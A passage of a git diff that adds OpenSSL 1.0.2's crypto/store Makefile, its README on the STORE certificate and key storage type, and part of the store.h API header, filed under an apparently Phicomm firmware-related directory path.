+# OpenSSL/crypto/store/Makefile
+#
+
+DIR=	store
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+#TEST= storetest.c
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= str_err.c str_lib.c str_meth.c str_mem.c
+LIBOBJ= str_err.o str_lib.o str_meth.o str_mem.o
+
+SRC= $(LIBSRC)
+
+#EXHEADER= store.h str_compat.h
+EXHEADER= store.h
+HEADER=	$(EXHEADER) str_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+str_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+str_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+str_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+str_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+str_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+str_err.o: ../../include/openssl/store.h ../../include/openssl/symhacks.h
+str_err.o: str_err.c
+str_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+str_lib.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+str_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+str_lib.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+str_lib.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+str_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+str_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+str_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+str_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+str_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+str_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+str_lib.o: ../../include/openssl/store.h ../../include/openssl/symhacks.h
+str_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+str_lib.o: str_lib.c str_locl.h
+str_mem.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+str_mem.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+str_mem.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+str_mem.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+str_mem.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+str_mem.o: ../../include/openssl/store.h ../../include/openssl/symhacks.h
+str_mem.o: str_locl.h str_mem.c
+str_meth.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+str_meth.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+str_meth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+str_meth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+str_meth.o: ../../include/openssl/store.h ../../include/openssl/symhacks.h
+str_meth.o: str_locl.h str_meth.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/README
new file mode 100644
index 0000000..966168f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/README
@@ -0,0 +1,95 @@
+The STORE type
+==============
+
+A STORE, as defined in this code section, is really a rather simple
+thing which stores objects and per-object associations to a number
+of attributes.  What attributes are supported entirely depends on
+the particular implementation of a STORE.  It has some support for
+generation of certain objects (for example, keys and CRLs).
+
+
+Supported object types
+----------------------
+
+For now, the objects that are supported are the following:
+
+X.509 certificate
+X.509 CRL
+private key
+public key
+number
+arbitrary (application) data
+
+The intention is that a STORE should be able to store everything
+needed by an application that wants a cert/key store, as well as
+the data a CA might need to store (this includes the serial number
+counter, which explains the support for numbers).
+
+
+Supported attribute types
+-------------------------
+
+For now, the following attributes are supported:
+
+Friendly Name		- the value is a normal C string
+Key ID			- the value is a 160 bit SHA1 hash
+Issuer Key ID		- the value is a 160 bit SHA1 hash
+Subject Key ID		- the value is a 160 bit SHA1 hash
+Issuer/Serial Hash	- the value is a 160 bit SHA1 hash
+Issuer			- the value is a X509_NAME
+Serial			- the value is a BIGNUM
+Subject			- the value is a X509_NAME
+Certificate Hash	- the value is a 160 bit SHA1 hash
+Email			- the value is a normal C string
+Filename		- the value is a normal C string
+
+It is expected that these attributes should be enough to support
+the need from most, if not all, current applications.  Applications
+that need to do certificate verification would typically use Subject
+Key ID, Issuer/Serial Hash or Subject to look up issuer certificates.
+S/MIME applications would typically use Email to look up recipient
+and signer certificates.
+
+There's added support for combined sets of attributes to search for,
+with the special OR attribute.
+
+
+Supported basic functionality
+-----------------------------
+
+The functions that are supported through the STORE type are these:
+
+generate_object		- for example to generate keys and CRLs
+get_object		- to look up one object
+			  NOTE: this function is really rather
+			  redundant and probably of lesser usage
+			  than the list functions
+store_object		- store an object and the attributes
+			  associated with it
+modify_object		- modify the attributes associated with
+			  a specific object
+revoke_object		- revoke an object
+			  NOTE: this only marks an object as
+			  invalid, it doesn't remove the object
+			  from the database
+delete_object		- remove an object from the database
+list_object		- list objects associated with a given
+			  set of attributes
+			  NOTE: this is really four functions:
+			  list_start, list_next, list_end and
+			  list_endp
+update_store		- update the internal data of the store
+lock_store		- lock the store
+unlock_store		- unlock the store
+
+The list functions need some extra explanation: list_start is
+used to set up a lookup.  That's where the attributes to use in
+the search are set up.  It returns a search context.  list_next
+returns the next object searched for.  list_end closes the search.
+list_endp is used to check if we have reached the end.
+
+A few words on the store functions as well: update_store is
+typically used by a CA application to update the internal
+structure of a database.  This may for example involve automatic
+removal of expired certificates.  lock_store and unlock_store
+are used for locking a store to allow exclusive writes.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/store.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/store.h
new file mode 100644
index 0000000..8343341
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/store.h
@@ -0,0 +1,658 @@
+/* crypto/store/store.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_STORE_H
+# define HEADER_STORE_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_STORE
+#  error STORE is disabled.
+# endif
+
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/evp.h>
+#  include <openssl/bn.h>
+#  include <openssl/x509.h>
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Already defined in ossl_typ.h */
+/* typedef struct store_st STORE; */
+/* typedef struct store_method_st STORE_METHOD; */
+
+/*
+ * All the following functions return 0, a negative number or NULL on error.
+ * When everything is fine, they return a positive value or a non-NULL
+ * pointer, all depending on their purpose.
+ */
+
+/* Creators and destructor.   */
+STORE *STORE_new_method(const STORE_METHOD *method);
+STORE *STORE_new_engine(ENGINE *engine);
+void STORE_free(STORE *ui);
+
+/*
+ * Give a user interface parametrised control commands.  This can be used to
+ * send down an integer, a data pointer or a function pointer, as well as be
+ * used to get information from a STORE.
+ */
+int STORE_ctrl(STORE *store, int cmd, long i, void *p, void (*f) (void));
+
+/*
+ * A control to set the directory with keys and certificates.  Used by the
+ * built-in directory level method.
+ */
+# define STORE_CTRL_SET_DIRECTORY        0x0001
+/*
+ * A control to set a file to load.  Used by the built-in file level method.
+ */
+# define STORE_CTRL_SET_FILE             0x0002
+/*
+ * A control to set a configuration file to load.  Can be used by any method
+ * that wishes to load a configuration file.
+ */
+# define STORE_CTRL_SET_CONF_FILE        0x0003
+/*
+ * A control to set a the section of the loaded configuration file.  Can be
+ * used by any method that wishes to load a configuration file.
+ */
+# define STORE_CTRL_SET_CONF_SECTION     0x0004
+
+/* Some methods may use extra data */
+# define STORE_set_app_data(s,arg)       STORE_set_ex_data(s,0,arg)
+# define STORE_get_app_data(s)           STORE_get_ex_data(s,0)
+int STORE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                           CRYPTO_EX_dup *dup_func,
+                           CRYPTO_EX_free *free_func);
+int STORE_set_ex_data(STORE *r, int idx, void *arg);
+void *STORE_get_ex_data(STORE *r, int idx);
+
+/* Use specific methods instead of the built-in one */
+const STORE_METHOD *STORE_get_method(STORE *store);
+const STORE_METHOD *STORE_set_method(STORE *store, const STORE_METHOD *meth);
+
+/* The standard OpenSSL methods. */
+/*
+ * This is the in-memory method.  It does everything except revoking and
+ * updating, and is of course volatile.  It's used by other methods that have
+ * an in-memory cache.
+ */
+const STORE_METHOD *STORE_Memory(void);
+# if 0                          /* Not yet implemented */
+/*
+ * This is the directory store.  It does everything except revoking and
+ * updating, and uses STORE_Memory() to cache things in memory.
+ */
+const STORE_METHOD *STORE_Directory(void);
+/*
+ * This is the file store.  It does everything except revoking and updating,
+ * and uses STORE_Memory() to cache things in memory.  Certificates are added
+ * to it with the store operation, and it will only get cached certificates.
+ */
+const STORE_METHOD *STORE_File(void);
+# endif
+
+/*
+ * Store functions take a type code for the type of data they should store or
+ * fetch
+ */
+typedef enum STORE_object_types {
+    STORE_OBJECT_TYPE_X509_CERTIFICATE = 0x01, /* X509 * */
+    STORE_OBJECT_TYPE_X509_CRL = 0x02, /* X509_CRL * */
+    STORE_OBJECT_TYPE_PRIVATE_KEY = 0x03, /* EVP_PKEY * */
+    STORE_OBJECT_TYPE_PUBLIC_KEY = 0x04, /* EVP_PKEY * */
+    STORE_OBJECT_TYPE_NUMBER = 0x05, /* BIGNUM * */
+    STORE_OBJECT_TYPE_ARBITRARY = 0x06, /* BUF_MEM * */
+    STORE_OBJECT_TYPE_NUM = 0x06 /* The amount of known object types */
+} STORE_OBJECT_TYPES;
+/* List of text strings corresponding to the object types. */
+extern const char *const STORE_object_type_string[STORE_OBJECT_TYPE_NUM + 1];
+
+/*
+ * Some store functions take a parameter list.  Those parameters come with
+ * one of the following codes. The comments following the codes below
+ * indicate what type the value should be a pointer to.
+ */
+typedef enum STORE_params {
+    STORE_PARAM_EVP_TYPE = 0x01, /* int */
+    STORE_PARAM_BITS = 0x02,    /* size_t */
+    STORE_PARAM_KEY_PARAMETERS = 0x03, /* ??? */
+    STORE_PARAM_KEY_NO_PARAMETERS = 0x04, /* N/A */
+    STORE_PARAM_AUTH_PASSPHRASE = 0x05, /* char * */
+    STORE_PARAM_AUTH_KRB5_TICKET = 0x06, /* void * */
+    STORE_PARAM_TYPE_NUM = 0x06 /* The amount of known parameter types */
+} STORE_PARAM_TYPES;
+/*
+ * Parameter value sizes.  -1 means unknown, anything else is the required
+ * size.
+ */
+extern const int STORE_param_sizes[STORE_PARAM_TYPE_NUM + 1];
+
+/*
+ * Store functions take attribute lists.  Those attributes come with codes.
+ * The comments following the codes below indicate what type the value should
+ * be a pointer to.
+ */
+typedef enum STORE_attribs {
+    STORE_ATTR_END = 0x00,
+    STORE_ATTR_FRIENDLYNAME = 0x01, /* C string */
+    STORE_ATTR_KEYID = 0x02,    /* 160 bit string (SHA1) */
+    STORE_ATTR_ISSUERKEYID = 0x03, /* 160 bit string (SHA1) */
+    STORE_ATTR_SUBJECTKEYID = 0x04, /* 160 bit string (SHA1) */
+    STORE_ATTR_ISSUERSERIALHASH = 0x05, /* 160 bit string (SHA1) */
+    STORE_ATTR_ISSUER = 0x06,   /* X509_NAME * */
+    STORE_ATTR_SERIAL = 0x07,   /* BIGNUM * */
+    STORE_ATTR_SUBJECT = 0x08,  /* X509_NAME * */
+    STORE_ATTR_CERTHASH = 0x09, /* 160 bit string (SHA1) */
+    STORE_ATTR_EMAIL = 0x0a,    /* C string */
+    STORE_ATTR_FILENAME = 0x0b, /* C string */
+    STORE_ATTR_TYPE_NUM = 0x0b, /* The amount of known attribute types */
+    STORE_ATTR_OR = 0xff        /* This is a special separator, which
+                                 * expresses the OR operation.  */
+} STORE_ATTR_TYPES;
+/*
+ * Attribute value sizes.  -1 means unknown, anything else is the required
+ * size.
+ */
+extern const int STORE_attr_sizes[STORE_ATTR_TYPE_NUM + 1];
+
+typedef enum STORE_certificate_status {
+    STORE_X509_VALID = 0x00,
+    STORE_X509_EXPIRED = 0x01,
+    STORE_X509_SUSPENDED = 0x02,
+    STORE_X509_REVOKED = 0x03
+} STORE_CERTIFICATE_STATUS;
+
+/*
+ * Engine store functions will return a structure that contains all the
+ * necessary information, including revokation status for certificates.  This
+ * is really not needed for application authors, as the ENGINE framework
+ * functions will extract the OpenSSL-specific information when at all
+ * possible.  However, for engine authors, it's crucial to know this
+ * structure.
+ */
+typedef struct STORE_OBJECT_st {
+    STORE_OBJECT_TYPES type;
+    union {
+        struct {
+            STORE_CERTIFICATE_STATUS status;
+            X509 *certificate;
+        } x509;
+        X509_CRL *crl;
+        EVP_PKEY *key;
+        BIGNUM *number;
+        BUF_MEM *arbitrary;
+    } data;
+} STORE_OBJECT;
+DECLARE_STACK_OF(STORE_OBJECT)
+STORE_OBJECT *STORE_OBJECT_new(void);
+void STORE_OBJECT_free(STORE_OBJECT *data);
+
+/*
+ * The following functions handle the storage. They return 0, a negative
+ * number or NULL on error, anything else on success.
+ */
+X509 *STORE_get_certificate(STORE *e, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[]);
+int STORE_store_certificate(STORE *e, X509 *data, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[]);
+int STORE_modify_certificate(STORE *e, OPENSSL_ITEM search_attributes[],
+                             OPENSSL_ITEM add_attributes[],
+                             OPENSSL_ITEM modify_attributes[],
+                             OPENSSL_ITEM delete_attributes[],
+                             OPENSSL_ITEM parameters[]);
+int STORE_revoke_certificate(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+int STORE_delete_certificate(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+void *STORE_list_certificate_start(STORE *e, OPENSSL_ITEM attributes[],
+                                   OPENSSL_ITEM parameters[]);
+X509 *STORE_list_certificate_next(STORE *e, void *handle);
+int STORE_list_certificate_end(STORE *e, void *handle);
+int STORE_list_certificate_endp(STORE *e, void *handle);
+EVP_PKEY *STORE_generate_key(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+EVP_PKEY *STORE_get_private_key(STORE *e, OPENSSL_ITEM attributes[],
+                                OPENSSL_ITEM parameters[]);
+int STORE_store_private_key(STORE *e, EVP_PKEY *data,
+                            OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[]);
+int STORE_modify_private_key(STORE *e, OPENSSL_ITEM search_attributes[],
+                             OPENSSL_ITEM add_sttributes[],
+                             OPENSSL_ITEM modify_attributes[],
+                             OPENSSL_ITEM delete_attributes[],
+                             OPENSSL_ITEM parameters[]);
+int STORE_revoke_private_key(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+int STORE_delete_private_key(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+void *STORE_list_private_key_start(STORE *e, OPENSSL_ITEM attributes[],
+                                   OPENSSL_ITEM parameters[]);
+EVP_PKEY *STORE_list_private_key_next(STORE *e, void *handle);
+int STORE_list_private_key_end(STORE *e, void *handle);
+int STORE_list_private_key_endp(STORE *e, void *handle);
+EVP_PKEY *STORE_get_public_key(STORE *e, OPENSSL_ITEM attributes[],
+                               OPENSSL_ITEM parameters[]);
+int STORE_store_public_key(STORE *e, EVP_PKEY *data,
+                           OPENSSL_ITEM attributes[],
+                           OPENSSL_ITEM parameters[]);
+int STORE_modify_public_key(STORE *e, OPENSSL_ITEM search_attributes[],
+                            OPENSSL_ITEM add_sttributes[],
+                            OPENSSL_ITEM modify_attributes[],
+                            OPENSSL_ITEM delete_attributes[],
+                            OPENSSL_ITEM parameters[]);
+int STORE_revoke_public_key(STORE *e, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[]);
+int STORE_delete_public_key(STORE *e, OPENSSL_ITEM attributes[],
+                            OPENSSL_ITEM parameters[]);
+void *STORE_list_public_key_start(STORE *e, OPENSSL_ITEM attributes[],
+                                  OPENSSL_ITEM parameters[]);
+EVP_PKEY *STORE_list_public_key_next(STORE *e, void *handle);
+int STORE_list_public_key_end(STORE *e, void *handle);
+int STORE_list_public_key_endp(STORE *e, void *handle);
+X509_CRL *STORE_generate_crl(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+X509_CRL *STORE_get_crl(STORE *e, OPENSSL_ITEM attributes[],
+                        OPENSSL_ITEM parameters[]);
+int STORE_store_crl(STORE *e, X509_CRL *data, OPENSSL_ITEM attributes[],
+                    OPENSSL_ITEM parameters[]);
+int STORE_modify_crl(STORE *e, OPENSSL_ITEM search_attributes[],
+                     OPENSSL_ITEM add_sttributes[],
+                     OPENSSL_ITEM modify_attributes[],
+                     OPENSSL_ITEM delete_attributes[],
+                     OPENSSL_ITEM parameters[]);
+int STORE_delete_crl(STORE *e, OPENSSL_ITEM attributes[],
+                     OPENSSL_ITEM parameters[]);
+void *STORE_list_crl_start(STORE *e, OPENSSL_ITEM attributes[],
+                           OPENSSL_ITEM parameters[]);
+X509_CRL *STORE_list_crl_next(STORE *e, void *handle);
+int STORE_list_crl_end(STORE *e, void *handle);
+int STORE_list_crl_endp(STORE *e, void *handle);
+int STORE_store_number(STORE *e, BIGNUM *data, OPENSSL_ITEM attributes[],
+                       OPENSSL_ITEM parameters[]);
+int STORE_modify_number(STORE *e, OPENSSL_ITEM search_attributes[],
+                        OPENSSL_ITEM add_sttributes[],
+                        OPENSSL_ITEM modify_attributes[],
+                        OPENSSL_ITEM delete_attributes[],
+                        OPENSSL_ITEM parameters[]);
+BIGNUM *STORE_get_number(STORE *e, OPENSSL_ITEM attributes[],
+                         OPENSSL_ITEM parameters[]);
+int STORE_delete_number(STORE *e, OPENSSL_ITEM attributes[],
+                        OPENSSL_ITEM parameters[]);
+int STORE_store_arbitrary(STORE *e, BUF_MEM *data, OPENSSL_ITEM attributes[],
+                          OPENSSL_ITEM parameters[]);
+int STORE_modify_arbitrary(STORE *e, OPENSSL_ITEM search_attributes[],
+                           OPENSSL_ITEM add_sttributes[],
+                           OPENSSL_ITEM modify_attributes[],
+                           OPENSSL_ITEM delete_attributes[],
+                           OPENSSL_ITEM parameters[]);
+BUF_MEM *STORE_get_arbitrary(STORE *e, OPENSSL_ITEM attributes[],
+                             OPENSSL_ITEM parameters[]);
+int STORE_delete_arbitrary(STORE *e, OPENSSL_ITEM attributes[],
+                           OPENSSL_ITEM parameters[]);
+
+/* Create and manipulate methods */
+STORE_METHOD *STORE_create_method(char *name);
+void STORE_destroy_method(STORE_METHOD *store_method);
+
+/* These callback types are use for store handlers */
+typedef int (*STORE_INITIALISE_FUNC_PTR) (STORE *);
+typedef void (*STORE_CLEANUP_FUNC_PTR) (STORE *);
+typedef STORE_OBJECT *(*STORE_GENERATE_OBJECT_FUNC_PTR)(STORE *,
+                                                        STORE_OBJECT_TYPES
+                                                        type,
+                                                        OPENSSL_ITEM
+                                                        attributes[],
+                                                        OPENSSL_ITEM
+                                                        parameters[]);
+typedef STORE_OBJECT *(*STORE_GET_OBJECT_FUNC_PTR)(STORE *,
+                                                   STORE_OBJECT_TYPES type,
+                                                   OPENSSL_ITEM attributes[],
+                                                   OPENSSL_ITEM parameters[]);
+typedef void *(*STORE_START_OBJECT_FUNC_PTR)(STORE *, STORE_OBJECT_TYPES type,
+                                             OPENSSL_ITEM attributes[],
+                                             OPENSSL_ITEM parameters[]);
+typedef STORE_OBJECT *(*STORE_NEXT_OBJECT_FUNC_PTR)(STORE *, void *handle);
+typedef int (*STORE_END_OBJECT_FUNC_PTR) (STORE *, void *handle);
+typedef int (*STORE_HANDLE_OBJECT_FUNC_PTR) (STORE *, STORE_OBJECT_TYPES type,
+                                             OPENSSL_ITEM attributes[],
+                                             OPENSSL_ITEM parameters[]);
+typedef int (*STORE_STORE_OBJECT_FUNC_PTR) (STORE *, STORE_OBJECT_TYPES type,
+                                            STORE_OBJECT *data,
+                                            OPENSSL_ITEM attributes[],
+                                            OPENSSL_ITEM parameters[]);
+typedef int (*STORE_MODIFY_OBJECT_FUNC_PTR) (STORE *, STORE_OBJECT_TYPES type,
+                                             OPENSSL_ITEM search_attributes[],
+                                             OPENSSL_ITEM add_attributes[],
+                                             OPENSSL_ITEM modify_attributes[],
+                                             OPENSSL_ITEM delete_attributes[],
+                                             OPENSSL_ITEM parameters[]);
+typedef int (*STORE_GENERIC_FUNC_PTR) (STORE *, OPENSSL_ITEM attributes[],
+                                       OPENSSL_ITEM parameters[]);
+typedef int (*STORE_CTRL_FUNC_PTR) (STORE *, int cmd, long l, void *p,
+                                    void (*f) (void));
+
+int STORE_method_set_initialise_function(STORE_METHOD *sm,
+                                         STORE_INITIALISE_FUNC_PTR init_f);
+int STORE_method_set_cleanup_function(STORE_METHOD *sm,
+                                      STORE_CLEANUP_FUNC_PTR clean_f);
+int STORE_method_set_generate_function(STORE_METHOD *sm,
+                                       STORE_GENERATE_OBJECT_FUNC_PTR
+                                       generate_f);
+int STORE_method_set_get_function(STORE_METHOD *sm,
+                                  STORE_GET_OBJECT_FUNC_PTR get_f);
+int STORE_method_set_store_function(STORE_METHOD *sm,
+                                    STORE_STORE_OBJECT_FUNC_PTR store_f);
+int STORE_method_set_modify_function(STORE_METHOD *sm,
+                                     STORE_MODIFY_OBJECT_FUNC_PTR store_f);
+int STORE_method_set_revoke_function(STORE_METHOD *sm,
+                                     STORE_HANDLE_OBJECT_FUNC_PTR revoke_f);
+int STORE_method_set_delete_function(STORE_METHOD *sm,
+                                     STORE_HANDLE_OBJECT_FUNC_PTR delete_f);
+int STORE_method_set_list_start_function(STORE_METHOD *sm,
+                                         STORE_START_OBJECT_FUNC_PTR
+                                         list_start_f);
+int STORE_method_set_list_next_function(STORE_METHOD *sm,
+                                        STORE_NEXT_OBJECT_FUNC_PTR
+                                        list_next_f);
+int STORE_method_set_list_end_function(STORE_METHOD *sm,
+                                       STORE_END_OBJECT_FUNC_PTR list_end_f);
+int STORE_method_set_update_store_function(STORE_METHOD *sm,
+                                           STORE_GENERIC_FUNC_PTR);
+int STORE_method_set_lock_store_function(STORE_METHOD *sm,
+                                         STORE_GENERIC_FUNC_PTR);
+int STORE_method_set_unlock_store_function(STORE_METHOD *sm,
+                                           STORE_GENERIC_FUNC_PTR);
+int STORE_method_set_ctrl_function(STORE_METHOD *sm,
+                                   STORE_CTRL_FUNC_PTR ctrl_f);
+
+STORE_INITIALISE_FUNC_PTR STORE_method_get_initialise_function(STORE_METHOD
+                                                               *sm);
+STORE_CLEANUP_FUNC_PTR STORE_method_get_cleanup_function(STORE_METHOD *sm);
+STORE_GENERATE_OBJECT_FUNC_PTR STORE_method_get_generate_function(STORE_METHOD
+                                                                  *sm);
+STORE_GET_OBJECT_FUNC_PTR STORE_method_get_get_function(STORE_METHOD *sm);
+STORE_STORE_OBJECT_FUNC_PTR STORE_method_get_store_function(STORE_METHOD *sm);
+STORE_MODIFY_OBJECT_FUNC_PTR STORE_method_get_modify_function(STORE_METHOD
+                                                              *sm);
+STORE_HANDLE_OBJECT_FUNC_PTR STORE_method_get_revoke_function(STORE_METHOD
+                                                              *sm);
+STORE_HANDLE_OBJECT_FUNC_PTR STORE_method_get_delete_function(STORE_METHOD
+                                                              *sm);
+STORE_START_OBJECT_FUNC_PTR STORE_method_get_list_start_function(STORE_METHOD
+                                                                 *sm);
+STORE_NEXT_OBJECT_FUNC_PTR STORE_method_get_list_next_function(STORE_METHOD
+                                                               *sm);
+STORE_END_OBJECT_FUNC_PTR STORE_method_get_list_end_function(STORE_METHOD
+                                                             *sm);
+STORE_GENERIC_FUNC_PTR STORE_method_get_update_store_function(STORE_METHOD
+                                                              *sm);
+STORE_GENERIC_FUNC_PTR STORE_method_get_lock_store_function(STORE_METHOD *sm);
+STORE_GENERIC_FUNC_PTR STORE_method_get_unlock_store_function(STORE_METHOD
+                                                              *sm);
+STORE_CTRL_FUNC_PTR STORE_method_get_ctrl_function(STORE_METHOD *sm);
+
+/* Method helper structures and functions. */
+
+/*
+ * This structure is the result of parsing through the information in a list
+ * of OPENSSL_ITEMs.  It stores all the necessary information in a structured
+ * way.
+ */
+typedef struct STORE_attr_info_st STORE_ATTR_INFO;
+
+/*
+ * Parse a list of OPENSSL_ITEMs and return a pointer to a STORE_ATTR_INFO.
+ * Note that we do this in the list form, since the list of OPENSSL_ITEMs can
+ * come in blocks separated with STORE_ATTR_OR.  Note that the value returned
+ * by STORE_parse_attrs_next() must be freed with STORE_ATTR_INFO_free().
+ */
+void *STORE_parse_attrs_start(OPENSSL_ITEM *attributes);
+STORE_ATTR_INFO *STORE_parse_attrs_next(void *handle);
+int STORE_parse_attrs_end(void *handle);
+int STORE_parse_attrs_endp(void *handle);
+
+/* Creator and destructor */
+STORE_ATTR_INFO *STORE_ATTR_INFO_new(void);
+int STORE_ATTR_INFO_free(STORE_ATTR_INFO *attrs);
+
+/* Manipulators */
+char *STORE_ATTR_INFO_get0_cstr(STORE_ATTR_INFO *attrs,
+                                STORE_ATTR_TYPES code);
+unsigned char *STORE_ATTR_INFO_get0_sha1str(STORE_ATTR_INFO *attrs,
+                                            STORE_ATTR_TYPES code);
